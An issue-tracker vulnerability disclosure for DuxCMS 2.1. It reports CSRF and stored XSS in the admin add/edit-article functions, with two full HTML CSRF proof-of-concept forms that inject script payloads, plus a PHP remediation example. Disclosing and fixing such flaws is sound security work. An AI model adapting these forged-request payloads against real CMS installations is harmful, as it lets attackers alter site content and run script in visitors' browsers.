王爷 / DuxCMS2.1 (supports PHP 7.0 and above)

Add article has CSRF and XSS

Status: To do
Created: 2020-01-09 10:05

Add/Edit article

Log in to the system and add an article like this.

[screenshot test-1]

The captured request shows an XSS vulnerability in the content parameter.

[screenshot test-2]

Edit article test

Generate a CSRF payload using the Burp Suite plugin.

[screenshot test-3]

Copy that and edit it like this. This is the edit-article payload:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1/DuxCMS/admin.php?r=article/AdminContent/edit" method="POST">
      <input type="hidden" name="class_id" value="2" />
      <input type="hidden" name="title" value="test333333" />
      <input type="hidden" name="image" value="" />
      <input type="hidden" name="content" value="sfdadsfadfasfdadsfadf&amp;lt&#59;script&amp;gt&#59;alert&#40;456&#41;&amp;lt&#59;&#47;script&amp;gt&#59;&#13;" />
      <input type="hidden" name="get_image" value="1" />
      <input type="hidden" name="get_image_num" value="1" />
      <input type="hidden" name="get_description" value="1" />
      <input type="hidden" name="description" value="sfdadsfadfa" />
      <input type="hidden" name="keywords" value="sfdadsfadfa" />
      <input type="hidden" name="taglink" value="1" />
      <input type="hidden" name="status" value="1" />
      <input type="hidden" name="font_color" value="0" />
      <input type="hidden" name="urltitle" value="test2" />
      <input type="hidden" name="url" value="" />
      <input type="hidden" name="time" value="2020&amp;lt&#59;script&amp;gt&#59;alert&#40;456&#41;&amp;lt&#59;&#47;script&amp;gt&#59;&#13;" />
      <input type="hidden" name="copyfrom" value="sds&amp;lt&#59;script&amp;gt&#59;alert&#40;456&#41;&amp;lt&#59;&#47;script&amp;gt&#59;&#13;" />
      <input type="hidden" name="views" value="6" />
      <input type="hidden" name="sequence" value="0" />
      <input type="hidden" name="tpl" value="" />
      <input type="hidden" name="content_id" value="2" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

If you want to edit "test111111":

[screenshot test-3]

Run this payload like this and it will successfully edit the article content.

[screenshot test-4]

[screenshot test-5]

Access this article and it will pop an alert like this.

[screenshot test-6]

Add article test

CSRF and XSS Payload

This payload adds an article with malicious JavaScript in the "content" parameter.

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1/DuxCMS/admin.php?r=article/AdminContent/add" method="POST">
      <input type="hidden" name="class&#95;id" value="1" />
      <input type="hidden" name="title" value="aaaaaaaaaaaaaaaaaaaaa" />
      <input type="hidden" name="image" value="" />
      <input type="hidden" name="content" value="sfdadsfadfasfdadsfadf&amp;lt&#59;script&amp;gt&#59;alert&#40;456&#41;&amp;lt&#59;&#47;script&amp;gt&#59;&#13;" />
      <input type="hidden" name="get&#95;image" value="1" />
      <input type="hidden" name="get&#95;image&#95;num" value="1" />
      <input type="hidden" name="get&#95;description" value="1" />
      <input type="hidden" name="description" value="adfads" />
      <input type="hidden" name="keywords" value="adfa" />
      <input type="hidden" name="taglink" value="1" />
      <input type="hidden" name="status" value="1" />
      <input type="hidden" name="font&#95;color" value="0" />
      <input type="hidden" name="urltitle" value="" />
      <input type="hidden" name="url" value="" />
      <input type="hidden" name="time" value="2020&#47;01&#47;08&#32;15&#58;49" />
      <input type="hidden" name="copyfrom" value="本站" />
      <input type="hidden" name="views" value="0" />
      <input type="hidden" name="sequence" value="0" />
      <input type="hidden" name="tpl" value="" />
      <input type="hidden" name="content&#95;id" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Run this payload.

[screenshot test-8]

You can see that one article "aaaaaaaaaaaaaaaaa" has been added.

[screenshot test-9]

Access it and it will successfully run the malicious JavaScript like this.

[screenshot test-10]

The CSRF and XSS vulnerabilities exist because no token is set for these functions and sensitive characters in the input are not filtered.

Solution

1) Set a token for this function.
2) Filter sensitive characters in all input data.
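As an added example (not DuxCMS's own code), here are the two fixes above in PHP: a synchronizer token checked by the add/edit handler, and HTML encoding of the fields the PoC targets. The session key, the `csrf_token` field name and the function names are assumptions.

```php
<?php
// Added example, not DuxCMS code: a synchronizer token plus output encoding for
// an "add/edit article" handler such as admin.php?r=article/AdminContent/add.
// The session key, field names and function names are assumptions.
session_start();

// Issue one random token per session; the admin form embeds it as a hidden
// <input name="csrf_token"> that a cross-site page cannot read.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Reject a state-changing POST unless it carries the session's token.
// hash_equals() compares in constant time.
function csrf_verify(array $post): bool {
    $sent = $post['csrf_token'] ?? '';
    $expected = $_SESSION['csrf_token'] ?? '';
    return $expected !== '' && is_string($sent) && hash_equals($expected, $sent);
}

// Encode user-controlled text before it is rendered, so "<script>" becomes
// literal text on the article page instead of executing.
function escape_field(string $value): string {
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Article handler: token check first, then encode every field the PoC abuses.
function handle_article_post(array $post): array {
    if (!csrf_verify($post)) {
        http_response_code(403);
        return ['ok' => false, 'error' => 'missing or invalid CSRF token'];
    }
    $clean = [];
    foreach (['title', 'content', 'time', 'copyfrom', 'description', 'keywords'] as $f) {
        $clean[$f] = escape_field((string) ($post[$f] ?? ''));
    }
    return ['ok' => true, 'article' => $clean];
}

// Constructed input, no real request: a forged POST without the token is
// refused; the same fields with the token are accepted and encoded.
$forged = ['title' => 'aaaa', 'content' => '<script>alert(456)</script>'];
var_dump(handle_article_post($forged)['ok']);
var_dump(handle_article_post($forged + ['csrf_token' => csrf_token()])['article']['content']);
```

If the CMS intentionally stores rich-text HTML in `content`, use an allowlist HTML sanitizer for that one field instead of `escape_field`, since escaping alone would break the editor's markup.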

godmarlin created this task
Repository: https://gitee.com/annyshow/DuxCMS2.1.git